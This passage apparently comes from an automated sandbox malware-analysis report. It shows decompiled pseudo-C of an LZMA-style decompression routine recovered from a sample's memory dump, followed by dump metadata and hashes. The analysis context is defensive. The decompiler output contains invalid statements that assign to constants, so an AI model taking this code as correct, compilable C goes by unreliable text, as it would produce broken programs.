												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406355, Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406355() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
